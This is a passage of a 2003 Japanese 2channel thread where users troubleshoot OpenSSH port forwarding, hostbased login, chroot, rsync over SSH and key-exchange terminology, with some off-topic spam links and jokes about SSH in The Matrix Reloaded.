IP アドレスがばれている以上、晒すのは危険かも....

813 :名無しさん@お腹いっぱい。:03/05/08 23:05
ssh -1
しとけばって話?

814 :名無しさん@お腹いっぱい。:03/05/08 23:15
あ、漏れと同じ大学・・・。

815 :名無しさん@お腹いっぱい。:03/05/09 09:11
ホストAにポートフォワーディングして
ssh -fNR 5910:localhost:5900 hostA
hostBから
vncviewer hostA:10
とやってもつながりません。
hostAから
vncviewer localhost:10
はつながります。
-Lでポートフォワーディングしてるときは-gをつければ同じようなことができたのですが、
-Rのときは-gをつけてもできません。どうすればいいですか

816 :名無しさん@XEmacs:03/05/09 12:50
>>815
> -Lでポートフォワーディングしてるときは-gをつければ同じようなことができたのですが、
> -Rのときは-gをつけてもできません。どうすればいいですか

そりゃ client の指図でそんなことされちゃったら server も大変だ
ろう。

sshd_config の man page をよく読むよろし。


817 :名無しさん@お腹いっぱい。:03/05/09 21:14
Redhat7.3でssh使ってるんですが、
ssh_exchange_identification: Connection closed by remote host
が出てアクセス出来ないというのはどのような原因が考えられますか?

以下が詳細です。
server: 192.168.0.3 client(w2k): 192.168.30.15と仮定します。
hosts.allowにはsshd : 192.168.30.15
hosts.denyにはALL : ALLと記述しています。
xinetd経由ではないのですが、sshdはhostsを読むという話を聞いたのでそうしています。
この状態でclient⇒Serverで上記のエラーを吐きます。
明日はhosts.allowにALL : 192.168.30.15と記述して試す予定ですが、
他にここもいじった方がいいというところがあればご指導お願いします。

818 :815:03/05/09 22:27
>>816
そうですか。リモートのことですからね。ありがとうございました。

819 :名無しさん@お腹いっぱい。:03/05/09 23:28
          ☆ チン     マチクタビレタ〜
                         マチクタビレタ〜
        ☆ チン  〃  Λ_Λ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
          ヽ ___\(\・∀・) < テポドン2まーだー?
             \_/⊂ ⊂_ )   \_____________
           / ̄ ̄ ̄ ̄ ̄ ̄ /|
        | ̄ ̄ ̄ ̄ ̄ ̄ ̄|  |
        | .愛媛みかん.  |/

820 :名無しさん@お腹いっぱい。:03/05/09 23:29
うごっ、誤爆スマソ・・・吊ってきまつ

821 :名無しさん@XEmacs:03/05/10 08:34
>>817
> Redhat7.3でssh使ってるんですが、
> ssh_exchange_identification: Connection closed by remote host
> が出てアクセス出来ないというのはどのような原因が考えられますか?

現象的には相手の identification_string (SSH-2.0-OpenSSH… とか
いうヤツ) を読んでる最中に \n が来る前に先方が接続を閉じちゃっ
たときに出るメッセージ。なので原因は分からんけど、

> hosts.allowにはsshd : 192.168.30.15
> hosts.denyにはALL : ALLと記述しています。

には関係なさそう (ここに来るのは hosts.* のチェック後)。

server/client の version を曝せばもう少し分かる (人がいる) かも。

> xinetd経由ではないのですが、sshdはhostsを読むという話を聞いたのでそうしています。

それは configure 次第。


822 :名無しさん@お腹いっぱい。:03/05/17 15:00
でぶでapt-getしていれたばあい sshd_configは
Protocol 2

てなってるはず。

Protocal 2,1
にしてもよいけどいまさらプロトコル1つーのもナンセンスだと思う

823 :名無しさん@お腹いっぱい。:03/05/17 20:07
>>822
TTSSH使っているユーザのために必要ってこともあろう。まぁそれでもPuTTY使え
っつーことになるんだろうけどな

824 :名無しさん@お腹いっぱい。:03/05/18 10:08
2199年: sshd のセキュリティホールが利用される
http://www.securityfocus.com/news/4831
http://lists.insecure.org/lists/nmap-hackers/2003/Apr-Jun/0010.html

825 :名無しさん@お腹いっぱい。:03/05/18 10:10
犯行現場を忘れておった
http://images.insecure.org/nmap/images/matrix/

826 :三村マサカズ@さまぁ〜ず:03/05/18 10:43
2199年なのにアドレスがまだ IPv4 かよっ!

827 :名無しさん@お腹いっぱい。:03/05/18 15:19
>>826
IP のバージョンと URL の表記に関連でも?

828 :824:03/05/18 16:00
う、実はよく知らないのにネタにしてスマソ。
>>825のあちこちに出てくる「10.2.2.2」っていうのが
v4のIPアドレスだと思ったのよ。違うの?

829 :826=828:03/05/18 16:02
826=828だけど824やなかった。カコワルイ&ゴメソ。

830 :初期不良:03/05/18 17:15
SSHv1 は使うなって事か...
>>826
プライベートアドレスだし IPv4 でもいいんじゃない?

831 :名無しさん@お腹いっぱい。:03/05/18 17:18
>>830
> SSHv1 は使うなって事か...
いや、単に既知の穴が使われただけなんでそうとも言えない。

832 :名無しさん@お腹いっぱい。:03/05/18 17:31
まだ見ていないからわからんが、 /. では年代を錯覚させている場面だから、
IPv4でよい、みたいなことを言っていたような。

833 :名無しさん@お腹いっぱい。:03/05/18 17:32
winscp2を使って、ssh2 rsa認証にてサーバーに接続していますが、
自分のホームディレクトリより上の階層が見えてしまいます。
皆さんはどのような対策をとっておられますか?
opensshにパッチを当ててインストールしなおして設定をいじれば良いようですが
opensshがアップデートされるとまた変更しなければならないようで
もっと良い方法をご存知の方教えていただけませんか?お願いします。

834 :名無しさん@お腹いっぱい。:03/05/18 19:32
SSH1がマズイ理由ってのが
どう検索しても見つからない。

835 :名無しさん@お腹いっぱい。:03/05/18 19:59
他のディレクトリ見えます。

836 :名無しさん@Emacs:03/05/18 20:01
>>834
まさか、検索キーワードが "SSH1" "マズイ"じゃないだろーな?

http://www.kb.cert.org/vuls/id/161576

837 :名無しさん@お腹いっぱい。:03/05/18 20:07
>>833
他のディレクトリが見えないようにするにはどうすれば良いですか?

838 :名無しさん@お腹いっぱい。:03/05/18 20:42
>>836
マズイ のほかにも検索キーワードつけたけど
おかしい 穴 セキュリティ
どれやってもダメだった

839 :名無しさん@お腹いっぱい。:03/05/18 20:58
>>838
> ssh-1 欠陥


840 :名無しさん@お腹いっぱい。:03/05/18 21:48
他のディレクトリが見えないようにするにはどうすれば良いですか?


841 :名無しさん@お腹いっぱい。:03/05/18 21:56
>>833
>>840
jailすれば?


842 :名無しさん@お腹いっぱい。:03/05/18 22:15
jail調べてみます。

843 :名無しさん@Emacs:03/05/19 01:04
>>838
> マズイ のほかにも検索キーワードつけたけど

ふつーは、ssh exploit とか ssh vulnerability
ではないかと思われ。結果的には英語を見ることになるが

844 :ワカンネ:03/05/19 01:36
sshでパスワードなしでログインしようと考えています。とりあえずセキュリティは無視してrootで行います。
ホストAとホストBでお互いに一度sshでログインした後

ホストA-------------------------------------------------
#ssh -V
OpenSSH_3.1p1, SSH protocols 1.5/2.0, OpenSSL 0x0090602f

#cat /etc/ssh/ssh_config
HostbasedAuthentication yes
PreferredAuthentications hostbased,publickey,password

# ls -l /usr/bin/ssh
-r-sr-xr-x 1 root root 219932 4月 5 2002 /usr/bin/ssh

ホストB-------------------------------------------------
# ssh -V
OpenSSH_3.1p1, SSH protocols 1.5/2.0, OpenSSL 0x0090602f

# cat /etc/ssh/sshd_config
RhostsAuthentication no
IgnoreRhosts no
RhostsRSAAuthentication yes
HostbasedAuthentication yes
Subsystem sftp /usr/libexec/openssh/sftp-server

# cat /root/.shosts
ホストA root
--------------------------------------------------------
この状態でホストAからホストBに
# ssh root@ホストB
としてもパスワードを聞かれてしまいます。どこか設定がおかしいのでしょうか?
何か基本的なところを見落としているような気がするのですが・・・

845 :名無しさん@お腹いっぱい。:03/05/19 02:06
>>843
> ふつーは、ssh exploit とか ssh vulnerability
> ではないかと思われ。結果的には英語を見ることになるが
しかしそれらは ssh protocol version 1 自体の欠陥ではないよね。

846 :((≡゜♀゜≡)):03/05/19 03:56
セクシーだよ
http://homepage3.nifty.com/coco-nut/

847 :822:03/05/19 06:33
>833

漏れはFreeBSD使ってるため

http://nadmin.org/howto/chrooted-ssh.html
ここのパッチを流用して3.6.1p2をchroot利用可能にした。

>opensshがアップデートされるとまた変更しなければならないようで
なら
scponlyとかいうのがよいかも
http://www.sublimation.org/scponly/

あとは自分で調べてくれい

848 :うひひ:03/05/19 10:27
こないだ友達の家にSSHのロゴが入った鏡があった
50mm丸くらいでカドがウマクモニタとかに付くような凸面鏡
なんでもSSH社ではソーシャルハックも含めsshに鏡を合わせれば
最強であるというジョークから生まれたらしいが
販促だか商品だかは良く聞かなかった

セキュリティ関係会社からTからイエローまで切れるロゴ入りハサミが
出ることを祈ってsage



849 :名無しさん@お腹いっぱい。:03/05/19 10:33
イエローを切れるハサミってどんなんだ。
裁縫バサミじゃおっつかなさそうだな。


850 :名無しさん@XEmacs:03/05/19 12:34
>>844
> # ssh root@ホストB
> としてもパスワードを聞かれてしまいます。どこか設定がおかしいのでしょうか?

これだけの情報でわかるか、という挑戦かい?sshd の log にはなん
にも出てないのかな?

これだけからとりあえず思い付く可能性としては:

・.shosts 中のホストA の記載が FQDN じゃない
・root の home directry が /root じゃない
・.shosts の access permission が不正
・ホストB に Protocol 2 用の鍵がないため、Protocol 1 で繋ごうと
 しちゃっている

くらいか。


851 :名無しさん@お腹いっぱい。:03/05/19 13:00
高枝切りバサミ

852 :844:03/05/19 22:12
>>850
マヂですんません。無事繋がりました。
・ホストB に Protocol 2 用の鍵がないため、Protocol 1 で繋ごうと
 しちゃっている
でした。今後質問するときも気を付けます。
ありがとうございました。

853 :名無しさん@XEmacs:03/05/20 12:39
>>852
> マヂですんません。無事繋がりました。
> ・ホストB に Protocol 2 用の鍵がないため、Protocol 1 で繋ごうと
>  しちゃっている
> でした。

あらま、それが当たりかい。いちばんありそうもないケースだろーと
思てたのに。

>今後質問するときも気を付けます。

今回のケースなら ssh -v の結果が貼り付けてあれば一目瞭然だった
でしょうからね。

ま、ここにあんまり長いの貼り付けるのもなにかもなので、春山さん
とこの SSH ML と使い分けるのがいいかも。


854 :山崎渉:03/05/22 01:51
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

855 :名無しさん@お腹いっぱい。:03/05/22 02:34
山崎対策age



856 :名無しさん@お腹いっぱい。:03/05/25 15:47
MATRIX RELOADED出演age

857 :名無しさん@お腹いっぱい。:03/05/26 20:54
>>856
どこ?

858 :名無しさん@お腹いっぱい。:03/05/26 21:03
>>856-857
>824-で激しく外出だよ〜ん♪


859 :名無しさん@お腹いっぱい。:03/05/26 21:09
http://images.insecure.org/nmap/images/matrix/
某MLに出てたのでsage

860 :名無しさん@お腹いっぱい。:03/05/26 21:57
>>859
>>825 が見えませんか。

861 :名無しさん@お腹いっぱい。:03/05/26 22:09
>>860
見えませんが何か?

862 :名無しさん@お腹いっぱい。:03/05/26 22:50
見苦しいやつ…

863 :名無しさん@お腹いっぱい。:03/05/27 01:57
>>862
うるせー馬鹿。鬼の首取ったように外出とか言ってんじゃねーよ。

864 :山崎渉:03/05/28 16:47
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

865 :名無しさん@お腹いっぱい。:03/05/30 23:44
以前から思ってたんですが、Win で sshd サービス立ち上げるのに、
Cygwin 以外の選択肢は無いスか?有料でもかまわんのだけど。

Win + ssh でググっても "Cygwin 導入" 的サイトしか見つからんのです。

866 :名無しさん@お腹いっぱい。:03/05/31 00:04
昔はOpenSSHのwin32portあったような。
製品版なら、ssh社のものがあるし。

867 :名無しさん@お腹いっぱい。:03/05/31 00:25
質問していいですか?
自宅のパソコンから大学のサーバーにsshでアクセスしたいのですがうまくいきません。
自宅側のルーターとかも設定しなくちゃだめなんでしょうか?

868 :名無しさん@お腹いっぱい。:03/05/31 00:34
「うまくいかない」ってどううまくいかないの?
タイムアウトするの?
タイムアウトするなら、どっかのルータがブロックしてるかもね。

869 :名無しさん@お腹いっぱい。:03/05/31 00:50
>>867
管理者に「外部からアクセスできますか?」と聞くのが第一手。

870 :867:03/05/31 01:01
コマンドプロンプトでnetstat -nを実行したらport22はestablishedって表示されるんです。
でも、telnet localhost 110を実行すると接続に失敗しましたってでるんですよ。

管理者からは外部からはssh接続できるってききました。

お二人とも早速レス下さってありがとうございます。

871 :名無しさん@お腹いっぱい。:03/05/31 01:21
>>870
その状態でこのスレに書き込んだキミの勇気に乾杯!
(今日はエビスの黒。こんなのが出たのか)

872 :867:03/05/31 01:30
>>871
すいません、勉強不足です・・・

後学のため、どこに手をつけたら解決できるか教えてはいただけないでしょうか。
sshの勉強をすればいいのか、ルーターの説明書を読むべきなのもわかりません。


黒なんてあるんですね。学生は発泡酒で乾杯です。

873 :名無しさん@お腹いっぱい。:03/05/31 01:34
>>872
「切り分け」をしよう。

telnet 大学のサーバ 22
を実行するとどうなるかね?
いつまで待っても何も出なかったり
すぐ切られたりしたらファイアウォールの問題。
SSH-2.0-OpenSSH_3.4p1 とかなんとか出れば ssh の問題。

874 :追加:03/05/31 01:53
867の頭の問題

875 :867:03/05/31 02:00
>>873
時間がかかって申し訳ありませんでした。
ご教示いただいた方法を試したところ

SSH-1.99-OpenSSH_3.5p1

と表示されました。
残念ながらこれを見ても自分には原因がわかりません。
お手数ですが、何を意味するのか教えていただけますか?

876 :867:03/05/31 02:01
残念ながらではなくて、恥ずかしながらですね。
いや、お恥ずかしい・・・

877 :名無しさん@お腹いっぱい。:03/05/31 02:04
そもそもどこまで理解してるんだか定かじゃないねぇ。
先にどっかで「質問の仕方」を身に付けてからにした方がお互いのためかも。


878 :867:03/05/31 02:15
>>877
ちょっとは自分で調べろってことでしょうか。

そうですね、明らかに知識が不足しています。

もうちょっと頑張ってみます。

879 :名無しさん@お腹いっぱい。:03/05/31 02:34
ssh -v しる。

880 :名無しさん@お腹いっぱい。:03/05/31 02:38
>>878
22 番は通ることはわかったんだから、ルータやファイアウォールの問題はない、と。

881 :名無しさん@お腹いっぱい。:03/05/31 02:40
870を読むに根本的に仕組みが理解できてないのではと(ry

882 :名無しさん@お腹いっぱい。:03/05/31 02:41
22 は通るのに、キミは telnet <server> 110 を実行している。
一体キミは何をしたいのか?

まずはそこから、でしょう。

関係ないが、今日電車の中でマスタリング TCP/IP を読んでいる若者がいた。
思わず後ろから方を叩いて「若者よ、がんばれ」と声をかけたくなった(w

883 :882:03/05/31 02:43
>>882
× 方
○ 肩
逝ってきます……

884 :867:03/05/31 02:45
そうですね、根本的に仕組みが理解できてません・・・
大学の説明書を読んで見よう見まねだけでやってました。

ルーターや火壁に問題ないということはもうお手上げです。

皆さんおじゃましました。
ありがとうございmす。

885 :867:03/05/31 02:47
>>882
大学の相談員の人にメールしたら、
そのコマンドでエラーがでるか確認してご覧といわれましたので実験してみました。

やっぱりちゃんとした本読んで仕組みを理解しろってことですね。

886 :名無しさん@お腹いっぱい。:03/05/31 02:54
>>884
まずは何をしたいのかを言ってみたら?
正直、あなたがやりたいことがよくわかりません。




ごめん嘘。自宅から大学のメールボックスにアクセスしたいんだよね?(w
もちろんいろいろな方法があるのだが、大学のマシンに対してあなたがどの
程度の権限を持っているのか等の付加情報が必要です。

ヒント: ポートフォワーディング

887 :867:03/05/31 03:03
>>886
そうです、メールボックスにアクセスしたいのです。

どの程度の権限ですか・・・。
大学のHPの説明ではSSH接続したならば、サーバーのlocalhostとして
認識されるから大学の内部からアクセスしたのと同じ状態になるそうです。
SSH接続できるようにサーバーのポートは開いてるそうです。

あと、IDとPASSは持ってます。
ってこんなあたりまえのことかくと、根本的にわかってないことまるわかりですよね。

888 :名無しさん@お腹いっぱい。:03/05/31 03:03
あー、localhostの110ってそういう意味だったのか
やっと納得


889 :_:03/05/31 03:06
http://homepage.mac.com/hiroyuki43/hankaku01.html

890 :867:03/05/31 03:13
>>888
説明不足でごめんなさい。

過不足なしの基準がわからなんで。

891 :直リン:03/05/31 03:14
http://homepage.mac.com/yuuka20/

892 :名無しさん@お腹いっぱい。:03/05/31 03:15
>>887
最初から全部やろうとせずに段階を追え

・ ssh で対象サーバにログインできたのか?
・ ログインできたのなら、ポートフォワードは設定したのか?
 ただし、クライアントに何を利用しているかにより設定方法は異なる。
 また、フォワードの「向き」にも注意
・ ポートフォワードを設定したのなら、ようやく>>870の確認方法の出番

893 :867:03/05/31 03:30
>>892
ポートフォワードですね。それをしてませんでした。
クライアントはSSH Communications Securityというところのを試用しています。
ここのトンネリングという設定項目をいじろうと思います。
あってますよね?


今まで2CHのレス見ておまえ馬鹿じゃないの、ちゃんと調べろよとか思ってましたが、
まさに自分が今そんな感じで申し訳なく思ってます。

今からポートフォワーディングに挑戦して解決したら報告に来ます。
優しい皆様方、厨な私にかまってくださってありがとうございました。

894 :名無しさん@お腹いっぱい。:03/05/31 08:53
>870
>>telnet localhost 110を実行
は、ssh接続後にsshのウィンドウの中でやってる?

895 :名無しさん@お腹いっぱい。:03/05/31 11:43
>>890
どこまで説明すれば良いかわかんなかったら、出せる限りの情報は先に出しとけよ。
出しすぎくらいでもかまわないからさ。長々としたレスでもかまわないからさ。
でないと、結局は今回みたいに数十レスを無駄にすることになる。
何をやりたくて、何を試して、どこまで進んで、どこでつまづいたか、全て書いとけ。
皆が皆、>>886 のように洞察力の優れた香具師ばかりっつーわけじゃないんだからさ。

896 :名無しさん@お腹いっぱい。:03/05/31 11:50
まぁ「挑戦する」と言ってるんで、
また来るまで生温かく放置でよかろう。

897 :名無しさん@お腹いっぱい。:03/06/02 14:25
誰か教えて!!
今、暗号勉強してて混乱してます。
あちこちのサイトとかで、Diffie-Hellman方式を公開鍵アルゴリズムの
中に入れている説明が多いんだけど、これって間違いですよね?

898 :名無しさん@お腹いっぱい。:03/06/02 15:35
間違いではないです。

899 :名無しさん@お腹いっぱい。:03/06/02 15:48
>>897
なぜ間違いだと思うのですか?

900 :897:03/06/02 16:08
Diffie-Hellmanって対称な共通鍵をネゴする為のものじゃ
ないんですか?
もちろん、これを使って公開鍵を伝達することも出来るで
しょうが、少なくとも公開鍵暗号アルゴリズムじゃない
と思うんですが。

901 :名無しさん@お腹いっぱい。:03/06/02 17:56
>>900
その間違っているというサイトの一例をあげてください。

きっと『公開鍵暗号アルゴリズム』の範囲が>897さんの思い込んでいる
範囲とずれているのでしょう。

902 :名無しさん@XEmacs:03/06/02 18:01
>>900
> Diffie-Hellmanって対称な共通鍵をネゴする為のものじゃ
> ないんですか?

・DH から ElGamal (の暗号部分) は非常に自然に導出できるからまぁ
 同義と言ってしまってさほど問題なし (PGPv5 以降の公開鍵暗号ア
 ルゴリズムを DH と呼んでる例は山ほどある)
・公開鍵暗号にしたところで上に書かれた以外の用途に用いることは
 極めて稀 (というか実用例はたぶん皆無。もちろん署名は除外)

だもんで、DH を『公開鍵 (暗号) アルゴリズム』と呼ぶことに特に違
和感はないなぁ。

903 :897:03/06/02 18:38
>>901
>その間違っているというサイトの一例をあげてください。

「diffie-hellman 公開鍵」でググルとたくさん出てきます。

>きっと『公開鍵暗号アルゴリズム』の範囲が>897さんの思い込んでいる
>範囲とずれているのでしょう。
どうも、これが正解のようです。
つまり「公開鍵方式」「DH方式」の定義の問題。
僕は「公開鍵方式=非対称鍵方式のペア鍵の片方を公開する方式」
と思い込んでました。
鍵を安全なルートで交換する必要がないものは全て「公開鍵方式」
とする定義も有効なようですね。


904 :897:03/06/02 18:40
>>902
SSH2やIPsecではElGamalじゃなく本来の意味での
Diffie-Hellman鍵交換(共通の秘密鍵の交換)が
使われているんじゃないんですか?

905 :名無しさん@XEmacs:03/06/02 21:52
>>904
> SSH2やIPsecではElGamalじゃなく本来の意味での
> Diffie-Hellman鍵交換(共通の秘密鍵の交換)が
> 使われているんじゃないんですか?

じゃなくて、公開鍵暗号にしたところで共通鍵をネゴするためにしか
使わないんだから公開鍵配布系と厳密に区別しても意味ないっしょ、っ
て話。



906 :名無しさん@お腹いっぱい。:03/06/02 22:02
>>905
えっ、そうなんですか?
「公開鍵暗号は共通鍵をネゴするためにしか使われない」
っていうのは僕には理解不能です。
もう少し勉強してまた来ます。。。。

907 :名無しさん@お腹いっぱい。:03/06/02 22:44
>>906
『…使われない』と言ってしまうとちょっと違うと私も思います。

パフォーマンスなどを考慮して*現状では*暗号化そのものには公開鍵を
使わないで共通鍵の交換にしか使っていない、ということでしょう。

908 :名無しさん@お腹いっぱい。:03/06/02 22:48
>>904
それで合ってます。

>897さんの公開鍵暗号の厳密な定義は間違ってはいないとは思いますが、実際のところ
それを厳格に守ることによって得るものがほとんどないので気にする人は少ないっていう
ところでしょうか。(しかし学問としてやってるなら厳密に区別してしかるべきでしょうね。)

909 :897:03/06/02 23:13
>>907
>>908
ああ、そういうことですか。。。
ユーザの立場だったら厳密に区別しても疲れるだけなんでし
ょうね。
僕はプログラマで、あるところから独自VPNの構築の仕事の
話が来ているもので、お客さんとの打ち合わせに先立って厳
密に理解しておきたいのです。
暗号方式に関わる諸概念が結構曖昧に使われているというこ
とが分かっただけでも収穫でした。どうもありがとう。

910 :直リン:03/06/02 23:14
http://homepage.mac.com/yuuka20/

911 :名無しさん@XEmacs:03/06/03 12:54
>>907
> パフォーマンスなどを考慮して*現状では*暗号化そのものには公開鍵を
> 使わないで共通鍵の交換にしか使っていない、ということでしょう。

なーんてことを考えてた時期もあったなぁ。いずれ公開鍵暗号だけで
すべてが済むほど計算機の性能が上がる筈だ、とか夢みたいなことを
ね。

現実は逆で計算機の性能が上がるほど公開鍵暗号が不利になるばかり
なりけり…。


912 :名無しさん@お腹いっぱい。:03/06/04 15:46
計算機の性能が上がりゃそれ以上に暗号強度も上げにゃあかんからなぁ…


913 :名無しさん@お腹いっぱい。:03/06/05 02:13
で、TTSSHのv2対応版が出たわけですが
みなさんもう使ってますか?

914 :初期不良:03/06/05 02:19
>>913
日本語関係変だったり putty 形式の鍵に変換しないといけなかったり
pagent 立ち上げないといけなかったりしなかったっけ?
面倒なんで ssh2 を使いたい場合は cygwin 使ってマフ

915 :初期不良:03/06/05 02:20
>>913
って TTSSH?! 見てきまつ

916 :初期不良:03/06/05 03:04
見つからないっす...

917 :名無しさん@お腹いっぱい。:03/06/05 04:02
>>913
そういうときは配布元 URL を貼るのが礼儀ってもんじゃねえか?

918 :名無しさん@お腹いっぱい。:03/06/05 08:40
ガセだよ

919 :名無しさん@お腹いっぱい。:03/06/05 15:40
chrootでパッチを当ててOpenSSHを使用しています。
ログインするとchrootで見える場所に/etc/passwdは
あるのですが、実際には読んでいないらしく、
ユーザIDとグループIDがそのまま表示されてしまいます。

ご存知の方教えていただけますでしょうか。

920 :おお:03/06/05 15:42
ゲーム感覚で貼りまくってやっーと月40万円稼いぎましたwww。

参加は無料なので参加してみるだけ参加してください。

自分でリンクを貼るより紹介者を集めた方が効率が良いようです。
紹介者の10%が自分の利益になります。

http://www.adultshoping.com/addclickport.cgi?pid=1052229999



921 :_:03/06/05 15:44
http://homepage.mac.com/hiroyuki43/moe/jaz08.html

922 :_:03/06/05 17:20
http://homepage.mac.com/hiroyuki43/moe/jaz08.html

923 :名無しさん@XEmacs:03/06/05 18:48
>>919
> chrootでパッチを当ててOpenSSHを使用しています。

OS は?

> ログインするとchrootで見える場所に/etc/passwdは
> あるのですが、実際には読んでいないらしく、
> ユーザIDとグループIDがそのまま表示されてしまいます。

system call 呼出の trace 付で ls -l とか呼んでみりゃ何が必要か
分かるだろう。たとえば OpenBSD だと /etc/pwd.db ってファイルが
要るようだし、とある linux では /etc/nsswitch.conf がないとマズー
みたいだし。



924 :_:03/06/05 19:13
http://homepage.mac.com/hiroyuki43/2ch.html

925 :_:03/06/05 20:51
http://homepage.mac.com/hiroyuki43/2ch.html

926 :名無しさん@お腹いっぱい。:03/06/11 10:58
逆引きに IP アドレスのようなものを書かれるとマズいらしい。

Vulnerability Note VU#978316
Vulnerability in OpenSSH daemon (sshd)
http://www.kb.cert.org/vuls/id/978316

OpenSSH remote clent address restriction circumvention
http://www.securityfocus.com/archive/1/324016/2003-06-02/2003-06-08/0

927 :名無しさん@お腹いっぱい。:03/06/15 22:05
マトリックスリローテッド観ました。
発電所を爆破するシーンでトリニティーがコンソールからSSHでログインしてました。
あんな未来までSSHは残るのですね。



928 :名無しさん@お腹いっぱい。:03/06/16 00:50
rsync+sshでディレクトリを同期しています。セキュリティ対策のためsshのポートを22から22222に変えたんですが、rsyncでコピーするときにsshのポートを指定する方法が分かりません。
rsync -avz -e "ssh -p 22222" --delete /home/ hogehoge@gehoho.hogege.net:/home/
とするとパスワードの入力はOKなんですが

[root@www:~]rsync -avz -e "ssh -p 22222" --delete /home/ hogehoge@gehoho.hogege.net:/home/
hogehoge@gehoho.hogege.net's password:
bash: line 1: rsync: command not found
rsync: connection unexpectedly closed (0 bytes read so far)
rsync error: error in rsync protocol data stream (code 12) at io.c(165)

となってその後にエラーが出てしまいます。単純に書き方が悪いんだと思いますが、どう書いたらいいのでしょうか?ググってもポートフォワーディングのことばっか当たるし・・・
たしけて。

929 :名無しさん@お腹いっぱい。:03/06/16 00:58
$HOME/.ssh/config 辺りに

Host gehoho.hogege.net
 Port 22222
でどうよ? man ssh_config


930 :名無しさん@お腹いっぱい。:03/06/16 01:17
>>929
どうもです。早速.ssh/configに追加してみました。ポートの指定なしに
rsync -avz --delete -e ssh /home/ hogehoge@gehoho.hogege.net:/home/
で繋がるようになりましたが・・・

その後、パスワードの入力後は先ほどと変わらず
hogehoge@gehoho.hogege.net's password:
bash: line 1: rsync: command not found
rsync: connection unexpectedly closed (0 bytes read so far)
rsync error: error in rsync protocol data stream (code 12) at io.c(165)
と出てしまいます。となると文法的には先ほどのであってたのでしょうか?
なんか別の所に問題がありそうなヨカソ。
command not foundって何ぢゃ?

931 :名無しさん@お腹いっぱい。:03/06/16 01:21
リモート側の rsync にパスが通ってないんと違う?


932 :名無しさん@お腹いっぱい。:03/06/16 01:22
>>927
マトリックス内の時代は 現代とそう変わらないから。
だから超未来のシーンってわけじゃないよ。

つーか、鍵屋のおっさんカッコイイ!

933 :名無しさん@お腹いっぱい。:03/06/16 01:29
>>931
すんません。どういう意味でしょう・・・?UNIXは日が浅いもんで。
リモート側のrsyncにパスが通ってないというとこの場合hogehogeに対して
通してあげればいいのでしょうか。

934 :_:03/06/16 01:37
http://homepage.mac.com/hiroyuki44/

935 :名無しさん@お腹いっぱい。:03/06/16 01:44
繋げる先のrsyncのパスを指定してみよう
--rsync-path=

936 :初期不良:03/06/16 05:02
>>932
違います。レトロさをフィーチャーしているんです。

937 :名無しさん@お腹いっぱい。:03/06/16 14:02
>>927
この辺の話?
http://www.nmap.org/

938 :ssh2:03/06/17 07:43
TeraTerm Pro Web 3.1.3 - Enhanced Telnet/SSH2 Client

http://www.ayera.com/teraterm/

939 :sage:03/06/17 13:09
>>935
繋がりますた。ありがとう!

940 :あれ?:03/06/17 13:10
sageだってば。間違いた。

941 :名無しさん@お腹いっぱい。:03/06/18 06:22
WinCEでPortForwardingによるtelnet接続を試みていますが、
成功しないため、何かアドバイスをいただけたらと思います。

環境
鯖:RedHat9 + OpenSSH 3.5p1
クライアント:Sigmarion2(H/PC2000) + PortForwarder1.1.1 + 24Term 2002.04.12版

やったこと
(1) 鯖で ssh-keygen -t rsa1 で鍵作成
(2) identity* をクライアントにコピー
(3) 鯖で identity.pubを ~/.ssh/authorized_keysにコピー
(4) PortForwardingの設定(後述)
(5) PortFowarderの起動
(6) 24Term で localhost に telnet

PortForwardingの設定(Config.txtファイル)
Host dqn
HostName dqn.omaemona.com
User nanashi
LocalForward 23 dqn.omaemona:23

PortForwarderによるSSH接続はできていると思います。
Status: Connetcted となり、シェルコマンドも正しい応答が得られます。
ですが、localhostにtelnetすると、エラーメッセージなどなく、すぐに接続が
切られてしまいます。鯖の/var/log/secureにはそれらしいものは
残っていません。

何か思い当たることがありましたらご意見ください。

942 :名無しさん@お腹いっぱい。:03/06/18 09:41
>>936
ちゃんと1作目見た?

943 :名無しさん@XEmacs:03/06/18 12:52
>>941
> 何か思い当たることがありましたらご意見ください。

PortForwarder は使ったことないんでよく分からんけど、どうやら
OpenSSH の config と同じ書式らしいので気付いた点。

> PortForwardingの設定(Config.txtファイル)
> Host dqn
> HostName dqn.omaemona.com
> User nanashi
> LocalForward 23 dqn.omaemona:23

サーバ (dqn.omaemona.com) で dqn.omaemona の名前解決はできてる?

んで、接続したサーバ自身の port を LocalForward したいってだけ
なら

> LocalForward 23 localhost:23

なんて書き方の方が紛れが少ない (かも)。


944 :名無しさん@お腹いっぱい。:03/06/18 16:22
>>927
あんた最悪。激しくガイシュツな上にネタばらし。

945 :名無しさん@お腹いっぱい。:03/06/18 18:39
>>941
PortForwarder 0.5.11 しか知らないけど、Show tty message のチェックをは
ずす


946 :名無しさん@お腹いっぱい。:03/06/19 07:59
>>941
> 何かアドバイスをいただけたらと思います。

他人のドメイン名を勝手に例示に用いないこと

947 :名無しさん@お腹いっぱい。:03/06/21 16:50
漏れが普通 ssh 接続すると、多くは rsa 接続になるような気がするのですが、
ある FreeBSD 機から ssh 接続すると、dsa を使います。

dsa を使って接続する、と言うのを明示的に指定できますか?
-1 や -2 だとプロトコルしか指定できないような気がして…。
-2 の上でさらに、rsa か dsa か、暗号化方式は選べないものでしょうか。

948 :名無しさん@お腹いっぱい。:03/06/21 17:16
>>947
-o

949 :名無しさん@お腹いっぱい。:03/06/21 17:20
スバラシイお答えですな。

-i とか IdentityFile じゃないのか

950 :名無しさん@Emacs:03/06/21 18:17
>>947
> 漏れが普通 ssh 接続すると、多くは rsa 接続になるような気がするのですが、
> ある FreeBSD 機から ssh 接続すると、dsa を使います。
>
> dsa を使って接続する、と言うのを明示的に指定できますか?

「dsa を使って接続する」というのがどういう意味かよくわからん…

> -1 や -2 だとプロトコルしか指定できないような気がして…。
> -2 の上でさらに、rsa か dsa か、暗号化方式は選べないものでしょうか。

SSHプロトコル2では dsa も rsa もユーザやリモートホストの
「認証」にしか使っていない。

で、ユーザ認証に使うアルゴリズムを選択したいのなら
>>949のとおり。

リモートホストの認証に使うアルゴリズム(= known_hosts ファイルに
書き込まれる公開鍵の種類)を選択したいのなら
ssh_config の HostKeyAlgorithms を指定すればよし。


951 :950:03/06/21 18:40
あ、950踏んでた。

次スレどうする?
進行遅そうだから>>980辺りまで待つ?

